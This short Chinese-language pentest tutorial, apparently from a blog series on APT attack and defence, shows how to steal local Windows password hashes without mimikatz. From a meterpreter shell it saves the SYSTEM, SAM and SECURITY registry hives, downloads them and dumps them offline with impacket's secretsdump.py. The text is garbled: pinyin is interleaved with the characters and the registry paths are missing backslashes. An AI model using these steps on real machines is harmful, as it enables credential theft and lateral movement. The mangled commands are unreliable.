專(zhuān)注APT攻擊與防御
https://micropoor.blogspot.com/
很多環(huán)境下,不允許上傳或者使用mimikatz。而針對(duì)非域控的單機(jī)離線(xiàn)提取hash顯得尤為重要。
在meterpreter shell命令切到交互式cmd命令。
reg save 方式使得需要下載的目標(biāo)機(jī)hash文件更小。
reg save HKLMSYSTEM sys.hiv
reg save HKLMSAM sam.hiv
reg save hklmsecurity security.hiv
meterpreter下自帶download功能。
離線(xiàn)提取:
本季用到的是impacket的 secretsdump.py。Kali默認(rèn)路徑:/root/impacket/examples/secretsdump.py命令如下:
1 root@John:/tmp# python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL
Micropoor